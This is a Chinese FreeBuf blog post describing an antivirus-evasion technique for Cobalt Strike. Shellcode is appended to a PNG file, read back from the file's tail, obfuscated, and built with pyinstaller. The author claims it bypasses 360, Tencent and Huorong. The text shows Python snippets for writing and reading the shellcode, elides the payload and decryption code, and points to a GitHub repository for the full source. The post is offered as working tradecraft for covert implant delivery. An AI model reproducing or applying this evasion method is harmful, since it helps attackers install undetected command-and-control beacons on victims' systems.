Python图片马免杀cobalt strike上线
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
过了360,腾讯,火绒,正常上线cobalt strike,来说一下免杀原理
主要使用的是图片马
首先创建一个给图片加马的脚本,准备一张照片,取名a.png
list = b"...shellcode"
png = open('a.png','ab+')#追加写入
png.write(list)
png.close()
print('写入完成')
在图片最后写入shellcode的二进制编码
然后创建一个读取马的脚本
png = open('a.png','rb')#二进制方式读取 shellcode = png.read()[-892:]#这里是shellcode的长度
然后给她睡一会也行,给她加个base64也行,这里我选择了python的一个奇怪的特性
一开始怎么加密都过不了火绒,然后就使用了函数加密
看起来是不是很混乱
这是解密区
最后用pyinstaller生成一下
正常过360,火绒,腾讯管家
这些源码已上传至git
https://github.com/soryecker/PicBypass
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐